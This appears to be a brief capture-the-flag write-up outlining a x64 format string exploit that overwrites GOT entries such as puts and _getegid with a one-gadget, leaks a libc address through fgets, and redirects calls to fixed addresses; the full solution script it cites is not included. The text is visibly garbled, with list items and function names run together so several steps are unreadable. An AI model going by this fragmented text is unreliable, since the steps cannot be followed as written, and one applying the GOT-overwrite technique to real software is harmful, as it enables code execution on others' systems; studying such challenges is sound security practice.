Rating:
This is basically a x64 format string attack. Our goal is to overwrite the got table with a magic gadget
However, we got 3 major problems:
puts
at once
puts
is used for looping, thus leaving us no other function to use for magic gadgetputs
callputs
to 0x40122E
so we can free _getegid
, _setresgid
and _setvbuf
fgets
so we can calculate the libc base_getegid
with the magic gadgetputs
to 0x4011BD
to return to _getegid
. This also satisfies the rax=NULL constraintFor the full solution, check returns.py